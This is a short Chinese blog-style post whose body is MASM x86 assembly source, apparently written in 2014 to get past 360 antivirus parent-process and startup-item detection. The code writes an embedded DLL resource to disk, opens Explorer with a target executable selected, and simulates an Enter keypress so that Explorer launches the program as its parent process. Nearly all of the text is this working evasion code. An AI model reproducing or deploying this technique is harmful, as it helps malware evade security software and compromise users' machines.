2014简单绕过某60父进程查杀



;落笔飞花笑百生

;2014.12.9

;过360父进程一个弱弱的方法

;过360启动项

.386

.model flat,stdcall

option casemap:none

include windows.inc

includelib kernel32.lib

include kernel32.inc

include user32.inc

includelib user32.lib

include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac

dll equ 105

.const

.data

windowname byte 100 dup (?)

tests byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0

version OSVERSIONINFOEX

explorerpatch byte "explorer /e, /select,  "

exepatch byte "C:\Program Files\tlxsoft\屏幕录像专家 共享版 V2014\屏录专家.exe",0

;exepatch byte 260 dup(?)

dllpatch byte 260 dup (?)

dllname byte "/xx.dll",0

dllpoiter dd 00

dllsize dd 00

filehandle dd 00

filewriteold dd 00

.code

start:

mov eax,offset tests

mov ebx,sizeof tests

add eax,ebx ;这里已经指向最后一个00

mov ecx,ebx

xor ebx,ebx

xor edi,edi

lop:

dec eax

mov  dl,byte ptr [eax]

cmp dl,'\'

je xx

jmp yy

xx:

cmp ebx,0

jne cc

mov ebx,ecx;第一个\

jmp yy

cc:

mov edi,ecx;第二个\

mov ecx,0

jmp loopend

yy:

loop lop

loopend:;这里就已经拿到了位置 EDI=正数第一个\EBX=正数最后一个\中间的也就是文件夹名字

mov eax,offset tests;首地址拿到手

ADD eax,edi

add  edi,1

sub ebx,edi;长度给ebx

;下面我们要复制字符串长度为ebx，起始地址为eax的字符串到一个位置就完成了这里当然用movs 指令来玩

mov ecx,ebx

cld

mov esi,eax

mov edi,offset windowname;这个就是文件夹的名称内存首地址

rep movsb

invoke GetCurrentDirectory,260,offset dllpatch

invoke lstrcat,addr dllpatch,addr dllname

invoke CreateFile,addr dllpatch,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL

mov filehandle,eax;文件句柄

invoke FindResource,NULL,dll,RT_RCDATA

mov dllsize,eax

invoke LoadResource,NULL, dllsize

invoke LockResource,eax

mov dllpoiter,eax;资源地址拿到手

invoke SizeofResource,NULL, dllsize

mov dllsize,eax;文件大小拿到手

invoke WriteFile, filehandle, dllpoiter, dllsize, filewriteold,NULL

;invoke GetModuleFileName,NULL,offset exepatch,sizeof exepatch

invoke WinExec,offset explorerpatch,SW_SHOW

invoke GetVersionEx,offset version 

;.if version.dwMajorVersion==5 && version.dwMinorVersion==1;XP系统就不用模拟了直接运行之。。

;jmp yy

;.endif

;yy:

invoke Sleep,2000

invoke FindWindow,$CTA0("CabinetWClass"),offset windowname

mov edx,eax

invoke SetForegroundWindow,eax

;;xxx代码

invoke keybd_event,VK_RETURN ,0,KEYEVENTF_EXTENDEDKEY,0

invoke keybd_event,VK_RETURN ,0,KEYEVENTF_KEYUP,0

invoke SendMessage,edx,WM_CLOSE,0,0

end start